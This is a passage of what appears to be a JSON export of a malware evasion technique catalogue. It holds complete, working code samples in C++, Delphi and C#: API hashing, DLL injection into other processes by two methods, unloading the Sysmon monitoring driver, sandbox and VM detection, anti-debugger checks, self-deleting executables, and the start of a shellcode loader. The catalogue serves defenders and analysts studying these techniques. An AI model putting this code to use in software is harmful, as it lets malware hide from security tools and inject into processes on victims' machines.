"plain_code": "#include <iostream>\r\n#include <Windows.h>\r\n\r\nDWORD getHashFromString(char *string) \r\n{\r\n\tsize_t stringLength = strnlen_s(string, 50);\r\n\tDWORD hash = 0x35;\r\n\t\r\n\tfor (size_t i = 0; i < stringLength; i++)\r\n\t{\r\n\t\thash += (hash * 0xab10f29f + string[i]) & 0xffffff;\r\n\t}\r\n\t// printf(\"%s: 0x00%x\\n\", string, hash);\r\n\t\r\n\treturn hash;\r\n}\r\n\r\nPDWORD getFunctionAddressByHash(char *library, DWORD hash)\r\n{\r\n\tPDWORD functionAddress = (PDWORD)0;\r\n\r\n\t// Get base address of the module in which our exported function of interest resides (kernel32 in the case of CreateThread)\r\n\tHMODULE libraryBase = LoadLibraryA(library);\r\n\r\n\tPIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)libraryBase;\r\n\tPIMAGE_NT_HEADERS imageNTHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)libraryBase + dosHeader->e_lfanew);\r\n\t\r\n\tDWORD_PTR exportDirectoryRVA = imageNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;\r\n\t\r\n\tPIMAGE_EXPORT_DIRECTORY imageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)libraryBase + exportDirectoryRVA);\r\n\t\r\n\t// Get RVAs to exported function related information\r\n\tPDWORD addresOfFunctionsRVA = (PDWORD)((DWORD_PTR)libraryBase + imageExportDirectory->AddressOfFunctions);\r\n\tPDWORD addressOfNamesRVA = (PDWORD)((DWORD_PTR)libraryBase + imageExportDirectory->AddressOfNames);\r\n\tPWORD addressOfNameOrdinalsRVA = (PWORD)((DWORD_PTR)libraryBase + imageExportDirectory->AddressOfNameOrdinals);\r\n\r\n\t// Iterate through exported functions, calculate their hashes and check if any of them match our hash of 0x00544e304 (CreateThread)\r\n\t// If yes, get its virtual memory address (this is where CreateThread function resides in memory of our process)\r\n\tfor (DWORD i = 0; i < imageExportDirectory->NumberOfFunctions; i++)\r\n\t{\r\n\t\tDWORD functionNameRVA = addressOfNamesRVA[i];\r\n\t\tDWORD_PTR functionNameVA = (DWORD_PTR)libraryBase + functionNameRVA;\r\n\t\tchar* functionName = (char*)functionNameVA;\r\n\t\tDWORD_PTR functionAddressRVA = 0;\r\n\r\n\t\t// Calculate hash for this exported function\r\n\t\tDWORD functionNameHash = getHashFromString(functionName);\r\n\t\t\r\n\t\t// If hash for CreateThread is found, resolve the function address\r\n\t\tif (functionNameHash == hash)\r\n\t\t{\r\n\t\t\tfunctionAddressRVA = addresOfFunctionsRVA[addressOfNameOrdinalsRVA[i]];\r\n\t\t\tfunctionAddress = (PDWORD)((DWORD_PTR)libraryBase + functionAddressRVA);\r\n\t\t\tprintf(\"%s : 0x%x : %p\\n\", functionName, functionNameHash, functionAddress);\r\n\t\t\treturn functionAddress;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n// Define CreateThread function prototype\r\nusing customCreateThread = HANDLE(NTAPI*)(\r\n\tLPSECURITY_ATTRIBUTES lpThreadAttributes,\r\n\tSIZE_T dwStackSize,\r\n\tLPTHREAD_START_ROUTINE lpStartAddress,\r\n\t__drv_aliasesMem LPVOID lpParameter,\r\n\tDWORD dwCreationFlags,\r\n\tLPDWORD lpThreadId\r\n);\r\n\r\nint main()\r\n{\r\n\t// Resolve CreateThread address by hash\r\n\tPDWORD functionAddress = getFunctionAddressByHash((char *)\"kernel32\", 0x00544e304);\r\n\r\n\t// Point CreateThread function pointer to the CreateThread virtual address resolved by its hash\r\n\tcustomCreateThread CreateThread = (customCreateThread)functionAddress;\r\n\tDWORD tid = 0;\r\n\r\n\t// Call CreateThread\r\n\tHANDLE th = CreateThread(NULL, NULL, NULL, NULL, NULL, &tid);\r\n\r\n\treturn 1;\r\n}"
},
{
"id": 92,
"language": {
"id": 7,
"label": "cmd",
"code_class": "cmd"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/182/?format=api",
"description": "",
"plain_code": "fltMC.exe unload SysmonDrv"
},
{
"id": 93,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/166/?format=api",
"description": "",
"plain_code": "PPEB pPEB = (PPEB)__readgsqword(0x60);\r\nPVOID params = (PVOID) * (PQWORD)((PBYTE)pPEB + 0x20);\r\nPWSTR environmental_variables = (PWSTR) * (PQWORD)((PBYTE)params + 0x80);\r\n\r\nwhile (environmental_variables)\r\n{\r\n PWSTR m = wcsstr(environmental_variables, L\"COMPUTERNAME=\");\r\n if (m) break;\r\n environmental_variables += wcslen(environmental_variables) + 1;\r\n}\r\nPWSTR computerName = wcsstr(environmental_variables, L\"=\") + 1;\r\nwcslwr(computerName);\r\nwprintf(L\"%s\", computerName);"
},
{
"id": 80,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/178/?format=api",
"description": "This code snippet demonstrate how to Inject a DLL in a remote process without using `WriteProcessMemory` and `VirtualAlloc(Ex)`.",
"plain_code": "(*\r\n Example of DLL Code to test DLL Injection:\r\n ------------------------------------------\r\n\r\n BOF>>\r\n\r\n library UnprotectTestDLL;\r\n\r\n uses\r\n WinApi.Windows,\r\n System.SysUtils,\r\n System.Classes;\r\n\r\n {$R *.res}\r\n\r\n procedure DllMain(AReason: Integer);\r\n var AMessage : String;\r\n AStrReason : String;\r\n begin\r\n case AReason of\r\n DLL_PROCESS_DETACH : AStrReason := 'DLL_PROCESS_DETACH';\r\n DLL_PROCESS_ATTACH : AStrReason := 'DLL_PROCESS_ATTACH';\r\n DLL_THREAD_ATTACH : AStrReason := 'DLL_THREAD_ATTACH';\r\n DLL_THREAD_DETACH : AStrReason := 'DLL_THREAD_DETACH';\r\n else\r\n AStrReason := 'REASON_UNKNOWN';\r\n end;\r\n\r\n AMessage := Format('(%s): Injected! Living in %d (%s) process.', [\r\n AStrReason,\r\n GetCurrentProcessId(),\r\n ExtractFileName(GetModuleName(0))\r\n ]);\r\n ///\r\n\r\n OutputDebugStringW(PWideChar(AMessage));\r\n end;\r\n\r\n begin\r\n DllProc := DllMain;\r\n DllMain(DLL_PROCESS_ATTACH)\r\n\r\n\r\n <<EOF\r\n*)\r\n\r\n// Support both x86-32 and x86-64\r\n\r\nprogram ProcEnvInjection_DLLInjection;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n Winapi.Windows,\r\n System.Math,\r\n System.SysUtils;\r\n\r\ntype\r\n EWindowsException = class(Exception)\r\n private\r\n FLastError : Integer;\r\n public\r\n {@C}\r\n constructor Create(const WinAPI : String); overload;\r\n\r\n {@G}\r\n property LastError : Integer read FLastError;\r\n end;\r\n\r\n {$IFDEF WIN64}\r\n PProcessBasicInformation = ^TProcessBasicInformation;\r\n TProcessBasicInformation = record\r\n ExitStatus : Int64;\r\n PebBaseAddress : Pointer;\r\n AffinityMask : Int64;\r\n BasePriority : Int64;\r\n UniqueProcessId : Int64;\r\n InheritedUniquePID : Int64;\r\n end;\r\n {$ELSE}\r\n PProcessBasicInformation = ^TProcessBasicInformation;\r\n TProcessBasicInformation = record\r\n ExitStatus : DWORD;\r\n PebBaseAddress : Pointer;\r\n AffinityMask : DWORD;\r\n BasePriority : DWORD;\r\n UniqueProcessId : DWORD;\r\n InheritedUniquePID : DWORD;\r\n end;\r\n {$ENDIF}\r\n\r\n UNICODE_STRING = record\r\n Length : Word;\r\n MaximumLength : Word;\r\n Buffer : LPWSTR;\r\n end;\r\n\r\n CURDIR = record\r\n DosPath : UNICODE_STRING;\r\n Handle : THandle;\r\n end;\r\n\r\n RTL_DRIVE_LETTER_CURDIR = record\r\n Flags : Word;\r\n Length : Word;\r\n TimeStamp : ULONG;\r\n DosPath : UNICODE_STRING;\r\n end;\r\n\r\n TRTLUserProcessParameters = record\r\n MaximumLength : ULONG;\r\n Length : ULONG;\r\n Flags : ULONG;\r\n DebugFlags : ULONG;\r\n ConsoleHandle : THANDLE;\r\n ConsoleFlags : ULONG;\r\n StandardInput : THANDLE;\r\n StandardOutput : THANDLE;\r\n StandardError : THANDLE;\r\n CurrentDirectory : CURDIR;\r\n DllPath : UNICODE_STRING;\r\n ImagePathName : UNICODE_STRING;\r\n CommandLine : UNICODE_STRING;\r\n Environment : Pointer;\r\n StartingX : ULONG;\r\n StartingY : ULONG;\r\n CountX : ULONG;\r\n CountY : ULONG;\r\n CountCharsX : ULONG;\r\n CountCharsY : ULONG;\r\n FillAttribute : ULONG;\r\n WindowFlags : ULONG;\r\n ShowWindowFlags : ULONG;\r\n WindowTitle : UNICODE_STRING;\r\n DesktopInfo : UNICODE_STRING;\r\n ShellInfo : UNICODE_STRING;\r\n RuntimeData : UNICODE_STRING;\r\n CurrentDirectories : array [0 .. 32-1] of RTL_DRIVE_LETTER_CURDIR;\r\n end;\r\n PRTLUserProcessParameters = ^TRTLUserProcessParameters;\r\n\r\n TPEB = record\r\n Reserved1 : array [0..2-1] of Byte;\r\n BeingDebugged : Byte;\r\n Reserved2 : Byte;\r\n Reserved3 : array [0..2-1] of Pointer;\r\n Ldr : Pointer;\r\n ProcessParameters : PRTLUserProcessParameters;\r\n Reserved4 : array [0..103-1] of Byte;\r\n Reserved5 : array [0..52-1] of Pointer;\r\n PostProcessInitRoutine : Pointer;\r\n Reserved6 : array [0..128-1] of byte;\r\n Reserved7 : Pointer;\r\n SessionId : ULONG;\r\n end;\r\n PPEB = ^TPEB;\r\n\r\nfunction NtQueryInformationProcess(\r\n ProcessHandle : THandle;\r\n ProcessInformationClass : DWORD;\r\n ProcessInformation : Pointer;\r\n ProcessInformationLength : ULONG;\r\n ReturnLength : PULONG\r\n): LongInt; stdcall; external 'ntdll.dll';\r\n\r\nconst PROCESS_BASIC_INFORMATION = 0;\r\n\r\nconstructor EWindowsException.Create(const WinAPI : String);\r\nvar AFormatedMessage : String;\r\nbegin\r\n FLastError := GetLastError();\r\n\r\n AFormatedMessage := Format('___%s: last_err=%d, last_err_msg=\"%s\".', [\r\n WinAPI,\r\n FLastError,\r\n SysErrorMessage(FLastError)\r\n ]);\r\n\r\n ///\r\n inherited Create(AFormatedMessage);\r\nend;\r\n\r\nfunction RandomString(ALength : Word) : String;\r\nconst AChars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';\r\nvar I : Integer;\r\nbegin\r\n result := '';\r\n ///\r\n\r\n randomize;\r\n\r\n for I := 1 to ALength do begin\r\n result := result + AChars[random(length(AChars))+1];\r\n end;\r\nend;\r\n\r\n\r\nfunction InjectDLL(const ADLLPath : String; AHostApplication: String; const AEggLength : Cardinal = 5) : Boolean;\r\nvar AStartupInfo : TStartupInfo;\r\n AProcessInfo : TProcessInformation;\r\n AEnvLen : Cardinal;\r\n pEnvBlock : Pointer;\r\n ARetLen : Cardinal;\r\n PBI : TProcessBasicInformation;\r\n APEB : TPEB;\r\n ABytesRead : SIZE_T;\r\n ARTLUserProcessParameters : TRTLUserProcessParameters;\r\n i : Integer;\r\n pOffset : Pointer;\r\n APayloadEgg : String;\r\n APayloadEnv : String;\r\n ABuffer : array of byte;\r\n pPayloadOffset : Pointer;\r\n AThreadId : Cardinal;\r\nbegin\r\n ZeroMemory(@AStartupInfo, SizeOf(TStartupInfo));\r\n AStartupInfo.cb := SizeOf(TStartupInfo);\r\n\r\n ZeroMemory(@AProcessInfo, SizeOf(TProcessInformation));\r\n\r\n result := False;\r\n\r\n APayloadEgg := RandomString(AEggLength);\r\n APayloadEnv := Format('%s=%s', [APayloadEgg, ADLLPath]);\r\n\r\n AEnvLen := (Length(APayloadEnv) * SizeOf(WideChar));\r\n\r\n GetMem(pEnvBlock, AEnvLen);\r\n try\r\n ZeroMemory(pEnvBlock, AEnvLen);\r\n Move(PWideChar(APayloadEnv)^, pEnvBlock^, AEnvLen);\r\n ///\r\n\r\n UniqueString(AHostApplication);\r\n\r\n if not CreateProcessW(\r\n PWideChar(AHostApplication),\r\n nil,\r\n nil,\r\n nil,\r\n False,\r\n CREATE_NEW_CONSOLE or CREATE_UNICODE_ENVIRONMENT,\r\n pEnvBlock,\r\n nil,\r\n AStartupInfo,\r\n AProcessInfo\r\n ) then\r\n raise EWindowsException.Create('CreateProcessW');\r\n\r\n // Tiny trick to be sure new process is completely initailized.\r\n // Remove bellow if you find it problematic.\r\n WaitForInputIdle(AProcessInfo.hProcess, INFINITE);\r\n\r\n if NtQueryInformationProcess(\r\n AProcessInfo.hProcess,\r\n PROCESS_BASIC_INFORMATION,\r\n @PBI,\r\n SizeOf(TProcessBasicInformation),\r\n @ARetLen\r\n ) <> ERROR_SUCCESS then\r\n raise EWindowsException.Create('NtQueryInformationProcess');\r\n\r\n if not ReadProcessMemory(\r\n AProcessInfo.hProcess,\r\n PBI.PebBaseAddress,\r\n @APEB,\r\n SizeOf(TPEB),\r\n ABytesRead\r\n ) then\r\n raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n if not ReadProcessMemory(\r\n AProcessInfo.hProcess,\r\n APEB.ProcessParameters,\r\n @ARTLUserProcessParameters,\r\n SizeOf(TRTLUserProcessParameters),\r\n ABytesRead\r\n ) then\r\n raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n // Scan Environment Variable Memory Block\r\n I := 0;\r\n\r\n SetLength(ABuffer, AEggLength * SizeOf(WideChar));\r\n\r\n pPayloadOffset := nil;\r\n\r\n while true do begin\r\n pOffset := Pointer(NativeUInt(ARTLUserProcessParameters.Environment) + I);\r\n ///\r\n\r\n if not ReadProcessMemory(\r\n AProcessInfo.hProcess,\r\n pOffset,\r\n @ABuffer[0],\r\n Length(ABuffer),\r\n ABytesRead\r\n ) then\r\n raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n if CompareMem(PWideChar(ABuffer), PWideChar(APayloadEgg), Length(ABuffer)) then begin\r\n pPayloadOffset := Pointer(NativeUInt(pOffset) + Length(ABuffer) + SizeOf(WideChar) { =\\0 });\r\n\r\n break;\r\n end;\r\n\r\n Inc(I, 2);\r\n end;\r\n\r\n SetLength(ABuffer, 0);\r\n\r\n if not Assigned(pPayloadOffset) then\r\n raise Exception.Create('Could not locate Injected DLL Path offset from remote process environment.');\r\n\r\n // Debug, read DLL path from remote process\r\n// SetLength(ABuffer, AEnvLen - (5 * SizeOf(WideChar)));\r\n// ReadProcessMemory(\r\n// AProcessInfo.hProcess,\r\n// pPayloadOffset,\r\n// @ABuffer[0],\r\n// Length(ABuffer),\r\n// ABytesRead\r\n// );\r\n// WriteLn(PWideChar(ABuffer));\r\n\r\n // Start DLL Injection\r\n if CreateRemoteThread(\r\n AProcessInfo.hProcess,\r\n nil,\r\n 0,\r\n GetProcAddress(GetModuleHandle('Kernel32.dll'), 'LoadLibraryW'),\r\n pPayloadOffset,\r\n 0,\r\n AThreadId\r\n ) = 0 then\r\n raise EWindowsException.Create('CreateRemoteThread');\r\n finally\r\n FreeMem(pEnvBlock, AEnvLen);\r\n end;\r\nend;\r\n\r\nbegin\r\n try\r\n InjectDLL('C:\\Temp\\UnprotectTestDLL.dll', 'C:\\Program Files\\Notepad++\\notepad++.exe');\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
},
{
"id": 81,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/93/?format=api",
"description": "",
"plain_code": "(*\r\n Example of DLL Code to test DLL Injection:\r\n ------------------------------------------\r\n\r\n BOF>>\r\n\r\n library UnprotectTestDLL;\r\n\r\n uses\r\n WinApi.Windows,\r\n System.SysUtils,\r\n System.Classes;\r\n\r\n {$R *.res}\r\n\r\n procedure DllMain(AReason: Integer);\r\n var AMessage : String;\r\n AStrReason : String;\r\n begin\r\n case AReason of\r\n DLL_PROCESS_DETACH : AStrReason := 'DLL_PROCESS_DETACH';\r\n DLL_PROCESS_ATTACH : AStrReason := 'DLL_PROCESS_ATTACH';\r\n DLL_THREAD_ATTACH : AStrReason := 'DLL_THREAD_ATTACH';\r\n DLL_THREAD_DETACH : AStrReason := 'DLL_THREAD_DETACH';\r\n else\r\n AStrReason := 'REASON_UNKNOWN';\r\n end;\r\n\r\n AMessage := Format('(%s): Injected! Living in %d (%s) process.', [\r\n AStrReason,\r\n GetCurrentProcessId(),\r\n ExtractFileName(GetModuleName(0))\r\n ]);\r\n ///\r\n\r\n OutputDebugStringW(PWideChar(AMessage));\r\n end;\r\n\r\n begin\r\n DllProc := DllMain;\r\n DllMain(DLL_PROCESS_ATTACH)\r\n\r\n\r\n <<EOF\r\n*)\r\n\r\n// Support both x86-32 and x86-64\r\n\r\nprogram DLLInjection_CreateRemoteThread_LoadLibrary;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n WinApi.Windows,\r\n System.SysUtils;\r\n\r\ntype\r\n EWindowsException = class(Exception)\r\n private\r\n FLastError : Integer;\r\n public\r\n {@C}\r\n constructor Create(const WinAPI : String); overload;\r\n\r\n {@G}\r\n property LastError : Integer read FLastError;\r\n end;\r\n\r\n\r\nconstructor EWindowsException.Create(const WinAPI : String);\r\nvar AFormatedMessage : String;\r\nbegin\r\n FLastError := GetLastError();\r\n\r\n AFormatedMessage := Format('___%s: last_err=%d, last_err_msg=\"%s\".', [\r\n WinAPI,\r\n FLastError,\r\n SysErrorMessage(FLastError)\r\n ]);\r\n\r\n ///\r\n inherited Create(AFormatedMessage);\r\nend;\r\n\r\nprocedure InjectDLL(const ADLLFile : String; const ATargetProcessId : Cardinal);\r\nvar hProcess : THandle;\r\n pOffset : Pointer;\r\n AThreadId : Cardinal;\r\n ABytesWritten : SIZE_T;\r\nbegin\r\n if not FileExists(ADLLFile) then\r\n raise Exception.Create('DLL file not found!');\r\n ///\r\n\r\n hProcess := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_READ or PROCESS_VM_WRITE, False, ATargetProcessId);\r\n if hProcess = 0 then\r\n raise EWindowsException.Create('OpenProcess');\r\n try\r\n pOffset := VirtualAllocEx(hProcess, nil, Length(ADLLFile), MEM_COMMIT, PAGE_READWRITE);\r\n if not Assigned(pOffset) then\r\n raise EWindowsException.Create('VirtualAllocEx');\r\n\r\n if not WriteProcessMemory(hProcess, pOffset, PWideChar(ADLLFile), Length(ADLLFile) * SizeOf(WideChar), ABytesWritten) then\r\n raise EWindowsException.Create('WriteProcessMemory');\r\n\r\n if CreateRemoteThread(hProcess, nil, 0, GetProcAddress(GetModuleHandle('Kernel32.dll'), 'LoadLibraryW'), pOffset, 0, AThreadId) = 0 then\r\n raise EWindowsException.Create('CreateRemoteThread');\r\n finally\r\n CloseHandle(hProcess);\r\n end;\r\nend;\r\n\r\nbegin\r\n try\r\n InjectDLL('c:\\temp\\UnprotectTestDLL.dll' {Desired DLL To Inject}, 12196 {Desired Process Id});\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
},
{
"id": 82,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/29/?format=api",
"description": "",
"plain_code": "program ADetectMouseMove;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n WinApi.Windows,\r\n WinApi.ShellAPI,\r\n System.Classes,\r\n System.SysUtils;\r\n\r\nvar APoint : TPoint;\r\n AOldPoint : TPoint;\r\n AMoveCount : Cardinal;\r\n\r\n// Update bellow constant to require more mouse move check before continue code execution\r\nconst AMaxMove = 5;\r\n\r\nbegin\r\n try\r\n GetCursorPos(AOldPoint);\r\n ///\r\n\r\n AMoveCount := 0;\r\n while True do begin\r\n GetCursorPos(APoint);\r\n\r\n if not PointsEqual(APoint, AOldPoint) then begin\r\n AOldPoint := APoint;\r\n\r\n Inc(AMoveCount);\r\n end;\r\n\r\n if AMoveCount >= AMaxMove then\r\n break;\r\n\r\n Sleep(1000);\r\n end;\r\n\r\n ///\r\n\r\n WriteLn('Mouse has moved, continue execution...');\r\n\r\n ShellExecuteW(0, 'open', 'calc.exe', nil, nil, SW_SHOW);\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
},
{
"id": 76,
"language": {
"id": 9,
"label": "C#",
"code_class": "csharp"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/8/?format=api",
"description": "",
"plain_code": "using System.Net.NetworkInformation;\r\n\r\n/*\r\nString[] vmMacAddresses =\r\n{\r\n \"08:00:27\",\r\n \"00:0C:29\",\r\n \"00:1C:14\",\r\n \"00:50:56\",\r\n \"00:05:69\",\r\n};\r\n*/\r\n\r\nvar vmMacAddresses = new Dictionary<string, string>();\r\n\r\nvmMacAddresses.Add(\"08:00:27\", \"VirtualBox\");\r\nvmMacAddresses.Add(\"00:0C:29\", \"VMWare\");\r\nvmMacAddresses.Add(\"00:1C:14\", \"VMWare\");\r\nvmMacAddresses.Add(\"00:50:56\", \"VMWare\");\r\nvmMacAddresses.Add(\"00:05:69\", \"VMWare\");\r\n// Add other ones bellow...\r\n\r\nforeach (NetworkInterface netInterface in NetworkInterface.GetAllNetworkInterfaces())\r\n{\r\n PhysicalAddress physicalAddress = netInterface.GetPhysicalAddress();\r\n if (physicalAddress == null)\r\n {\r\n continue;\r\n }\r\n\r\n String mac = String.Join(\":\", (from b in physicalAddress.GetAddressBytes().Take(3) select b.ToString(\"X2\")));\r\n\r\n if (vmMacAddresses.ContainsKey(mac))\r\n {\r\n throw new Exception(\r\n String.Format(\"{0} Detected from its MAC Address.\", vmMacAddresses.GetValueOrDefault(mac)) \r\n );\r\n }\r\n\r\n Console.WriteLine(\"No VM Detected :)\");\r\n}"
},
{
"id": 77,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/54/?format=api",
"description": "",
"plain_code": "program NtQueryProcessInformation;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n Winapi.Windows,\r\n System.SysUtils;\r\n\r\nfunction NtQueryInformationProcess(\r\n ProcessHandle : THandle;\r\n ProcessInformationClass : DWORD;\r\n ProcessInformation : Pointer;\r\n ProcessInformationLength : ULONG;\r\n ReturnLength : PULONG\r\n): LongInt; stdcall; external 'ntdll.dll';\r\n\r\n// https://docs.microsoft.com/en-gb/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess\r\nfunction isDebuggerPresent(): Boolean;\r\nvar hProcess : THandle;\r\n APortNumber : DWORD;\r\n ARetLen : Cardinal;\r\n\r\nconst ProcessDebugPort = 7;\r\nbegin\r\n hProcess := GetCurrentProcess();\r\n if hProcess = 0 then\r\n Exit();\r\n ///\r\n\r\n if NtQueryInformationProcess(hProcess, ProcessDebugPort, @APortNumber, sizeOf(DWORD), @ARetLen) <> ERROR_SUCCESS then\r\n Exit();\r\n\r\n result := APortNumber <> 0;\r\nend;\r\n\r\nbegin\r\n try\r\n if isDebuggerPresent() then\r\n raise Exception.Create('Debugger Detected !');\r\n\r\n WriteLn('No Debugger Detected :)');\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\n\r\n WriteLn('Press a return key to close application.');\r\n ReadLn;\r\nend."
},
{
"id": 78,
"language": {
"id": 9,
"label": "C#",
"code_class": "csharp"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/54/?format=api",
"description": "",
"plain_code": "using System;\r\nusing System.Runtime.InteropServices;\r\n\r\n[DllImport(\"ntdll.dll\", SetLastError = true)]\r\nstatic extern int NtQueryInformationProcess(\r\n IntPtr processHandle,\r\n int processInformationClass,\r\n ref IntPtr processInformation,\r\n uint processInformationLength,\r\n ref IntPtr returnLength\r\n);\r\n\r\n[DllImport(\"kernel32.dll\", SetLastError = true)]\r\nstatic extern IntPtr GetCurrentProcess();\r\n\r\nbool isBeingDebugged()\r\n{\r\n var ERROR_SUCCESS = 0x0;\r\n var ProcessDebugPort = 0x7;\r\n\r\n IntPtr currProcessHandle = GetCurrentProcess();\r\n if (currProcessHandle == IntPtr.Zero)\r\n {\r\n throw new Exception(\"Could not retrieve current process handle.\");\r\n }\r\n\r\n IntPtr returnLength = IntPtr.Zero;\r\n IntPtr portNumber = IntPtr.Zero;\r\n\r\n int ntStatus = NtQueryInformationProcess(currProcessHandle, ProcessDebugPort, ref portNumber, (uint)IntPtr.Size, ref returnLength); \r\n if (ntStatus != ERROR_SUCCESS)\r\n {\r\n throw new Exception(\"Could not query information process.\");\r\n }\r\n\r\n return (portNumber != IntPtr.Zero);\r\n}\r\n\r\nif (isBeingDebugged())\r\n{\r\n throw new Exception(\"Debugger Detected !\");\r\n}\r\n\r\nConsole.WriteLine(\"No Debugger Detected :)\");"
},
{
"id": 79,
"language": {
"id": 9,
"label": "C#",
"code_class": "csharp"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/167/?format=api",
"description": "",
"plain_code": "using System;\r\nusing System.Diagnostics;\r\n\r\nProcessStartInfo processInfo = new ProcessStartInfo();\r\n\r\nprocessInfo.CreateNoWindow = true;\r\nprocessInfo.FileName = \"cmd.exe\";\r\nprocessInfo.Arguments = String.Format(\r\n \"/c for /l %i in (0) do ( timeout 1 && del \\\"{0}\\\" && IF NOT EXIST \\\"{0}\\\" (exit /b))\",\r\n System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName\r\n);\r\nProcess.Start(processInfo);"
},
{
"id": 75,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/178/?format=api",
"description": "Author: @x86matthew",
"plain_code": "#include <stdio.h>\r\n#include <windows.h>\r\n\r\n#define LOADER_CODE_OFFSET 8\r\n\r\nstruct PROCESS_BASIC_INFORMATION\r\n{\r\n\tDWORD ExitStatus;\r\n\tBYTE *PebBaseAddress;\r\n\tDWORD *AffinityMask;\r\n\tDWORD BasePriority;\r\n\tDWORD *UniqueProcessId;\r\n\tDWORD *InheritedFromUniqueProcessId;\r\n};\r\n\r\n#define ProcessBasicInformation 0\r\n\r\nDWORD (WINAPI *NtQueryInformationProcess)(HANDLE hProcessHandle, DWORD ProcessInformationClass, PVOID ProcessInformation, DWORD ProcessInformationLength, DWORD *ReturnLength);\r\nDWORD (WINAPI *NtCreateThreadEx)(HANDLE *phThreadHandle, DWORD DesiredAccess, PVOID ObjectAttributes, HANDLE hProcessHandle, PVOID StartRoutine, PVOID Argument, ULONG CreateFlags, DWORD *pZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, PVOID AttributeList);\r\n\r\nBYTE bGlobal_LoaderCode[] =\r\n{\r\n\t// prefix\r\n\t'A', 0x00, 'A', 0x00, 'A', 0x00, '=', 0x00,\r\n\r\n\t// push edi\r\n\t0x57,\r\n\t// push esi\r\n\t0x56,\r\n\r\n\t// push 0x40 (PAGE_EXECUTE_READWRITE)\r\n\t0x6A, 0x40,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (MEM_COMMIT | MEM_RESERVE)\r\n\t0x50,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 